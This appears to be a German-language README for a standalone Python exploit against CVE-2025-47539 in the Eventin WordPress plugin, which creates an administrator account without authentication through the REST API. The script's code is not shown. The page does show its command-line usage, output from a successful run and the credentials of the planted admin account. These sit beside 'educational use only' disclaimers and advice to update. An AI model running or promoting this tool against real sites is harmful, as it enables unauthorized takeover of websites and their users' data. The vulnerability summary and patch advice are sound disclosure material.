
Eventin <= 4.0.26 - Fehlende Autorisierung zu nicht authentifizierter Privilegieneskalation
Das Event Manager, Events Calendar, Tickets, Registrations – Eventin-Plugin für WordPress ist anfällig für nicht authentifizierte Privilegienausweitung aufgrund einer fehlenden Autorisierungsprüfung in der Funktion import_items().
<= 4.0.26CVE-2025-475399.8 (Critical)May 7, 2025May 15, 2025Nicht authentifizierte Angreifer können eine bösartige Anfrage an die REST-API senden und ohne jegliche Benutzerinteraktion einen neuen Benutzer mit administrator-Berechtigungen erstellen.
Dieses Python-Skript ist ein eigenständiges Exploit-Tool für CVE-2025-47539.
Es wird:
⚠️ Dieses Skript ist nur für Bildungszwecke und professionelle Sicherheitsbewertungen gedacht.
usage: a.py [-h] -u URL
Exploit for CVE-2025-47539 # By Nxploited (Khaled Alenazi)
options:
-h, --help show this help message and exit
-u, --url URL Target base URL (e.g. http://target.com)
By:Nxploited (Khaled_alenazi) | [email protected]
[+] Exploitation succeeded
[+] Response:
{"message":"Successfully imported speaker"}
[+] Exploited Account Details
Name : Nxploited (Khaled_alenazi)
Email : [email protected]
Username : NxPloted
Password : nxploit123
Role : administrator
Exploit: By: Nxploited (Khaled_alenazi)
Use this script for educational purposes only. I am not responsible for your actions.
Mehr als 10.000+ WordPress-Seiten sind nachweislich anfällig für diesen Exploit.
Alle Site-Administratoren, die Eventin ≤ 4.0.26 verwenden, sollten sofort auf Version 4.0.28 oder höher aktualisieren.
Dieses Tool wird nur für Bildungs- und autorisierte Penetrationstests bereitgestellt.
Der Ersteller ist nicht verantwortlich für Missbrauch oder Schäden, die durch dieses Skript verursacht werden.
Von: Nxploited ( Khaled_Alenazi )
📧 Kontakt: [email protected]